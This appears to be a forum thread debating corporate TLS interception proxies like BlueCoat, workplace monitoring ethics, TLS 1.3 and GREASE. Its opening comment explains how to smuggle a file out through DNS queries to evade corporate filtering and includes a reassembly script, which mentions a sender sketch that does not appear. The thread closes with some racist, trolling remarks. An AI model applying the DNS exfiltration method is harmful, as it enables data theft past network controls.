For those who don't know, there are even full IP proxies that use DNS [1], but you can hack up a primitive one by setting up a nameserver for a domain, turning on full query logging, and using a shell script that splits your file up, encodes it into valid DNS labels, and requests [some encoded segment].[yourdomain]. Now your file will be sitting in pieces in your DNS query log, and all you need is a simple script to re-assemble it.
Best of all, it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate-limited to be useful.
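And the re-assembly script really is simple. A Python sketch, assuming query-log lines containing names shaped like the sender sketch above ("<seq>.<base32 chunk>.yourdomain.example"); real logs would need more careful parsing:

    # Sketch: rebuild the file from a nameserver query log.
    import base64
    import re

    def reassemble(log_lines, domain="yourdomain.example"):
        pattern = re.compile(r"(\d+)\.([a-z2-7]+)\." + re.escape(domain))
        chunks = {}
        for line in log_lines:
            m = pattern.search(line)
            if m:
                chunks[int(m.group(1))] = m.group(2)
        encoded = "".join(chunks[k] for k in sorted(chunks)).upper()
        encoded += "=" * (-len(encoded) % 8)  # restore base32 padding
        return base64.b32decode(encoded)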
The VPN clients offer "hotspot login" or similar functionality so that you can open up access. It doesn't work for other uses, just for opening that VPN so that your company computer can connect to the company network.
That obvious workaround doesn't give you a 24/7 hole from the Internet. To copy information, you need a person to knowingly do it. This decreases the attack surface tremendously.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised, when it holds a root private key trusted by all your devices and has read/modify access to all the traffic.
> It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks ...
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass.
In that case, it sounds like the device is effective after all.
It depends how much the data is worth. That's really the problem.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
>It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
We opted to disable USB mass storage, since cavity searches seemed a little much.
> We opted to disable USB mass storage, since cavity searches seemed a little much.
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganography, and so on.
The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
And the A-Team could land on the roof with a helicopter in the middle of the night, take control of the building, breach the data center, and physically steal and leave with all the servers.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up to the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, a random person on the Internet, thinks.
Bad generalization - in many countries, it's illegal for your company to do content inspection.
There's a good argument that it's unethical too. There are many ways where your company has to trust you instead of pervasively monitoring your doings and communications, and this should fall in the same area.
Put it on the endpoint. You already need protection on the endpoint to protect against malware, etc and MITM solutions only cover assets on the internal network. What about company laptops?
Pretty much all the endpoint solutions MITM exactly the same way as the middlebox, by running as a proxy listening on localhost. They also pretty much universally do an even worse job than the network middleboxes of handling invalid certs and supporting modern TLS, hard as that may be to believe. Then you have the added nightmare of ensuring a client on tens or hundreds of thousands of endpoints is fully patched and functioning correctly.
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
Endpoint-based MITM solutions tend to be even worse for security, since they have a larger attack surface (and generally seem to be really badly implemented). On the plus side, some things can be done locally without MITM.
From a privacy perspective, it doesn't really matter if the monitoring happens centralized or not.
In the cases where I've seen strict filtering laptops were forced through VPN connections to HQ, where the gateway then decides what parts of internal and external networks they are allowed to access.
I agree that this is how they see it, but it's a losing battle. There's no filter for people's minds, or for what they write down. The owner of a company cannot approach this problem from the perspective of technical bandaids; they absolutely must trust the right people, and only the right people.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some goddamn ethics; I'd sooner quit than snoop on traffic in this manner.
If the use of the MITM is public, it is more like requiring you to leave outbound paper mail in an outbox without an envelope, and then having the internal mail office archive it and add the envelope. Perfectly reasonable.
What you do while at work should not be personal, and thus cannot be snooped upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
All MITM proxies I know require an enterprise CA trusted by the end-point. If that CA is on your machine the endpoint is probably owned by your employer. It is legal in most jurisdictions for your employer to monitor the usage of resources they have provided, be it computer or network.
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also though I don't like it, employers in the US do have the right to open mail addressed to you personally if delivered to the office.
Legal and ethical aren't the same thing, though. I agree it's legal for your employer to monitor traffic on their network. But an ethical sysadmin would not facilitate their doing so (unless there were a fairly significant and unusual justification in context).
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Personally I think that is too simplistic a position, and the reality is more complex. Most people would agree that using this approach to spy on your employees to track their banking activity is unethical. Using MITM-SSL as a way to get visibility on certain APTs using products such as FireEye is controversial, but I don't personally believe it to be unethical.
I would argue against such an approach if there were alternatives, but if the organization's leaders were set on it, I would engage with the process and make sure that it did not evolve into more unethical practices, such as logging all traffic contents or the above banking example.
What law in the US makes it illegal to circumvent an encryption system? I can think of the DMCA's prohibitions against circumvention measures for DRM, but that's specific to protecting copyrighted works.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.
This is legally required in some sectors for regulation purposes, notably finance. I think a lot of people who casually throw out this sentiment don't appreciate that aspect of it.
+1. I work in regulatory compliance at a financial firm. My current firm doesn't do this because we don't originate trades, but when I worked at a hedge fund, all forms of electronic communication were MITM'd and recorded for regulatory reasons (and to monitor for IP theft - we did sue a soon-to-be-former employee after he emailed the source for a quantitative model to his personal Gmail), primarily to combat or defend against insider trading.
No. I've never worked for GS. In the case I'm talking about, the employee was sued 4 hours before he was fired. Federal criminal charges came a few months later.
It's my understanding that BlueCoat is used pretty heavily in some schools. Most of the students there don't have the option of "working" somewhere else.
Basic filtering can be done via passively inspecting SNI headers and terminating connections to verboten hosts. However, that's not enough for some orgs, and some software works around it: https://www.bamsoftware.com/papers/fronting/
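For the curious, here is roughly what passive SNI extraction involves - a Python sketch with error handling omitted, offsets per RFC 5246/6066:

    # Sketch: pull the SNI hostname out of a raw TLS ClientHello record,
    # the way a passive filter would. Assumes a well-formed hello.
    import struct

    def extract_sni(hello):
        # record header (5) + handshake header (4) + version (2) + random (32)
        pos = 5 + 4 + 2 + 32
        pos += 1 + hello[pos]                        # session_id
        (n,) = struct.unpack_from("!H", hello, pos)
        pos += 2 + n                                 # cipher_suites
        pos += 1 + hello[pos]                        # compression_methods
        (ext_total,) = struct.unpack_from("!H", hello, pos)
        pos += 2
        end = pos + ext_total
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack_from("!HH", hello, pos)
            pos += 4
            if ext_type == 0:                        # server_name extension
                # skip list length (2) and name_type (1); read name length
                (name_len,) = struct.unpack_from("!H", hello, pos + 3)
                return hello[pos + 5:pos + 5 + name_len].decode("ascii")
            pos += ext_len
        return None  # no SNI; some filters just drop such connections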
At my workplace we need to use middleboxes like this for two reasons:
- Our commitment to our customers and regulatory compliance requires that we know where customer data is at all times. It would be lovely if all employees could be trusted with data at all times, but the reality is some employees will steal information, as Google found out with Levandowski. That was Google's own information, though; they don't have a regulatory requirement to report the breach, whereas the data I protect legally requires full disclosure.
- Malware is increasingly using HTTPS to communicate with C&C. Many malware families now install a trusted root cert so they can exfiltrate data on the less-monitored 443 rather than 80. When (not if) devices get compromised, we need to know what the attacker got.
I would love to not need to do this because it's a privacy mess and breaks applications all the time, but there simply are not better tools to serve as the last line of defence against data loss.
iOS has mostly solved this problem through a combination of not running unsigned code and APIs where MDM can draw a corporate data barrier inside the phone, but while desktop OSes remain, there will need to be some form of this.
There are ways to filter content without breaking user privacy. For example, you could restrict access to the Internet altogether, and suggest that your users only get what they need from your internal corporate network. See how incredibly productive that makes your staff?
What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees. Sadly, it looks like Google is caving in to their pressure.
> Sadly, it looks like Google is caving in to their pressure.

Maybe someone like Mozilla won't.
All browser vendors provide the necessary bits for properly implemented HTTPS MITM (which are fairly simple: basically "trust locally installed certificate roots and ignore key pinning for them"), and have done so for ages.
> What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees
Because one size really does fit all, and all environments have the same needs?
I MITM my own connections for filtering purposes. It turns out to be the most effective way of blocking and changing crap not just in my main browsers (I use several), but also in those embedded in other apps, whether for phoning home or otherwise.
I do the same. I have experimented with various solutions and am currently using haproxy. This also fixes problems with clients that are, sadly, not SNI-capable.
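For anyone curious what self-MITM filtering looks like in practice, here is a minimal sketch using mitmproxy's addon API (the hostnames are made up, and mitmproxy is just one of several tools that can do this):

```python
# block_hosts.py -- run with: mitmproxy -s block_hosts.py
from mitmproxy import http

# Hypothetical blocklist; substitute whatever you want to filter.
BLOCKED_HOSTS = {"tracker.example.com", "ads.example.net"}

def request(flow: http.HTTPFlow) -> None:
    # Short-circuit requests to blocked hosts with a local 403,
    # so the request never leaves the machine.
    if flow.request.pretty_host in BLOCKED_HOSTS:
        flow.response = http.Response.make(
            403, b"blocked by local policy", {"Content-Type": "text/plain"}
        )
```

Note that clients must trust mitmproxy's locally generated CA for HTTPS to work, which is exactly the MITM mechanism discussed throughout this thread, just applied to your own traffic by your own choice.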
> "Enterprise class Blue Coat’s SSL Visibility Appliance is comprehensive, extensible solution that assures high-security encryption. While other vendors only support a handful of cipher-standards, the SSL Visibility Appliance provides timely and complete standards support, with over 70 cipher suites and key exchanges offered, and growing. Furthermore, unlike competitive offerings, this solution does not “downgrade” cryptography levels and weaken your organization’s security posture, putting it at greater risk. As the SSL/TLS standards evolve, so will the management and enforcement capabilities of the SSL Visibility Appliance."
It sounds like if you run a web server, you should think about supporting only TLS 1.3, with no downgrade, to ensure that your visitors can't be subjected to interception by a third party (even if it is their own enterprise).
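As a sketch of what that looks like in practice, using Python's standard ssl module (the certificate paths are placeholders):

```python
import ssl

# Refuse anything below TLS 1.3, so nothing on the path can negotiate
# the connection down to an older, interceptable protocol version.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
ctx.maximum_version = ssl.TLSVersion.TLSv1_3
ctx.load_cert_chain("server.crt", "server.key")  # placeholder paths
```

The trade-off, as this whole thread illustrates, is that visitors behind a version-intolerant middlebox won't degrade gracefully; they simply won't connect at all.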
The second party in this instance is the organisation, including the user. The enterprise owns the pipe, the router, the endpoint device, the chair the user sits on, and the time being used by the employee while they are not on a break. They are a representative of the enterprise while they use a workplace computer, and while they do have an expectation of privacy on devices under certain circumstances, that is balanced against my need to protect the enterprise from bad actors.

I am obliged to MitM the significant majority of SSL connections, but I do so after acquiring informed consent from the employee: via both workplace policy, to which they must agree to remain employed, and a clickthrough notification on logon that SSL is intercepted and use is monitored. In exchange, I will only make use of information collected that is pertinent to such protection activities. For instance, if I see a Bookface post about a party at the weekend posted during a break, that is discarded. If a post is captured that is sending business-confidential information to a competitor, that is collected and used in a formal process.
If you break my ability to monitor the use of my devices, your product is dropped from my network. You'll also find that it is dropped from the entire education sector. That is why Chrome has backed off this change.
Many a head-scratching web application error investigation has resulted in an "a-ha" moment when you notice the `X-BlueCoat-Via` header in your logs. It does stuff like issuing GETs against URLs that only have POST handlers. It issues these random requests having procured its users' auth cookies even when the real user has since left the site.
There is a massive hypocrisy in browser vendors getting hysterical about self-signed certs while letting MITM proxies operate with impunity, or, worse, working with them.
Why isn't there an effort to detect MITM proxies and post equally scary warnings? Surely users have a right to know.
MITM is worse than self-signed certs, and if 'exceptions' can be found for MITM (corporate security, management, etc.), then the same exceptions should be found for self-signed certs for individuals, rather than creating dependencies on CA 'authorities'. This is just another instance of furthering corporate interests while sacrificing individuals.
How can a browser distinguish between a self-signed server certificate, and a MITM proxy presenting a self-signed server certificate?
The scary warnings for self-signed certificates are in fact a protection against MITM. It's because of them that MITM proxies are forced to install a CA certificate. The main difference is that installing a CA certificate requires explicit action on the user's machine (and on some newer systems displays scary warnings), whereas if a MITM proxy could simply present a fake self-signed certificate, it could easily intercept anyone. Silently accepting self-signed certificates would therefore be strictly worse.
Because it does not rely on any 'authority'. The increasingly scary warnings from browser vendors are in stark contrast to their zero interest in detecting MITMs and warning users. The next step could very well be disabling the ability to add exceptions for self-signed certs.
Why not promote content encryption or explore other ideas that do not rely on central authorities? As it stands, there are always workarounds for corporates, but individuals are thrown under the bus.
I kinda hoped that TLS 1.3 had some magick in it so that those MITM proxies would no longer work because they can be recognized by the browser and the browser can say: how about no.
Also, weren't there some security issues relating to the possibility of downgrading the encryption of a connection?
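For what it's worth, TLS 1.3 does include downgrade protection (RFC 8446, section 4.1.3): a 1.3-capable server that ends up negotiating an older version embeds a sentinel in the last 8 bytes of its ServerHello random, which a 1.3-capable client checks. A minimal sketch of that check:

```python
# Downgrade-protection sentinels from RFC 8446, section 4.1.3.
DOWNGRADE_TO_TLS12 = bytes.fromhex("444f574e47524401")          # "DOWNGRD" + 0x01
DOWNGRADE_TO_TLS11_OR_BELOW = bytes.fromhex("444f574e47524400")  # "DOWNGRD" + 0x00

def looks_like_downgrade(server_random: bytes) -> bool:
    """True if a TLS-1.3-capable server signalled that the handshake
    was negotiated down to an older protocol version."""
    return server_random[-8:] in (DOWNGRADE_TO_TLS12, DOWNGRADE_TO_TLS11_OR_BELOW)
```

Note this only helps against downgrade attacks on a genuine end-to-end connection. A MITM proxy whose root the client trusts sees no such protection, because it *is* the server as far as the client is concerned.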
Wouldn't it be better to allow enterprises to do version pinning (which I believe used to be supported in Chrome enterprise), rather than remove TLS 1.3 for everyone?
This is a good point. Google has added functionality so that user-installed certificates bypass certificate pinning entirely, so users behind these tools are less protected. However, there is no indication that the network is being monitored once the certificate has been installed.
On Android, a warning is shown every time a user-installed certificate authority is used. Furthermore, the user is forced to set a lock screen the moment they install a certificate.
If Google can push this (frankly user-unfriendly) UI through, why not change "Secure" to "Monitored" in Google Chrome? The green padlock is a lie, and the truth is exposed only after inspecting the certificate using the web developer tools.
This is something the TLS spec authors have prepared against with GREASE. The idea is the client adds some junk version information to its list of supported protocols. To quote: "Correct server implementations will ignore these values and interoperate. Servers that do not tolerate unknown values will fail to interoperate with existing clients, revealing the mistake before it is widespread."
This doesn't really seem to solve anything: everyone now ignores the enumerated GREASE values, since they are reserved up front, and will continue to fail on other extended values. Yay?
It at least means that the developer is aware that these parts of the spec are extensible, and that by special-casing the GREASE values they are knowingly choosing to potentially have a broken application in the future. That is a different class of problem from developers who weren't aware certain fields were extensible.
To explain the other answer a bit more: TLS upgrades have always been opt-in. The problem is that you have to be very careful about where you put that option, or some (expensive and popular and dumb) webservers and middleboxes will just freak out and block the client.
The obvious place is the TLS version number in the handshake. The client can say "I support up to TLS 1.3", the other side can say "I support up to TLS 1.2", and the obvious choice is 1.2. But some webservers and middleboxes, as soon as they see 1.3 there, freak out and block the connection completely.
Another idea for where to put it is in the candidate ciphers list: an "oh, and I support TLS 1.3" pseudo-"cipher". The other side is supposed to simply not use it if it's not recognized. But again, some stuff out there just freaks out.
Why do they freak out? Sometimes it's because someone thought that any unrecognized bit could be a hacking attempt. Sometimes it's because the software started as a pile of bugs and was just debugged to the point that it mostly works today (and at that time "1.3" was never seen at exactly that spot).
So the goal of GREASE is to put random not-yet-enumerated values in places like the ciphers list. Once a server or middlebox is compatible with GREASE, it'll be compatible with any future optional upgrade signal being present in those parts of the TLS handshake.
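Concretely, the reserved GREASE code points follow a simple pattern (both bytes equal, low nibble 0xA), and a client picks one at random to sprinkle into its cipher list and extensions. A sketch of how a client might do that, purely for illustration:

```python
import random

# The 16 GREASE code points reserved by RFC 8701:
# 0x0a0a, 0x1a1a, 0x2a2a, ..., 0xfafa.
GREASE_VALUES = [(b << 8) | b for b in range(0x0A, 0x100, 0x10)]

def grease_cipher_list(real_ciphers):
    """Prepend one random GREASE value to the advertised cipher suites.
    A correct peer must ignore the unknown value and negotiate normally;
    a broken one fails immediately, exposing the bug before it matters."""
    return [random.choice(GREASE_VALUES)] + list(real_ciphers)
```

The randomization matters: because implementers can't predict which value will show up, they can't special-case their way around it, which is exactly what defeated the pseudo-cipher trick above.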
(I'm not sure where GREASE has been implemented so far, and I'm not sure if TLS 1.3 is 100% finalized yet.)
I wasn't clear, but I meant "opt-in" in the sense that it would be enabled on the client by optional configuration, with big warnings for users on "corporate networks". This would draw attention to the issue, because every time the version was bumped, the web would be flooded with "be sure to opt in to the TLS upgrade, unless you're on a shitty BlueCoat network!" advice. Eventually BlueCoat would get the message.
I understand that proper network hosts will negotiate TLS versions rather than "freaking out".
Browsers should add a button which allows being proxied, combined with a campaign to educate people on the difference.
I think it's reasonable for a company to want to filter everything that comes through their pipe; if anything, it's a bit of a liability not to do it. But at the same time, non-technical people should understand that their connection is being decrypted and re-encrypted, and be educated on the consequences.
There are a few local coffee shops which terminate SSL, and when people see me closing my browser and laptop, or starting to tether through my phone because of the cert error, they tell me "oh, you just need to accept all those certs!"
We've banned this account. National slurs are not welcome here. Also, you've posted many uncivil and/or unsubstantive comments. That makes this site worse and is not allowed (and we warned you repeatedly).
You're reading something that isn't there. Russians are like the whitest people on earth. South Korea and Singapore aren't "shitholes" by any measure. However, by their BlueCoat use, they are "wannabe shitholes".
I clicked through to find you are "antifa". Didn't you get the memo? You can't be seen to defend Russia in any way!
While Russians are, yeah, pretty white, that still reads as pretty racist. "Wannabe shitholes" is... kinda not a good look. Just sayin'.
EDIT: also worth pointing out, Russia is literally the only country listed that has a "white" population. So, yeah, downvote all y'all want, that was a racist (or trolling) comment.
you're totally right on that last point though. ;)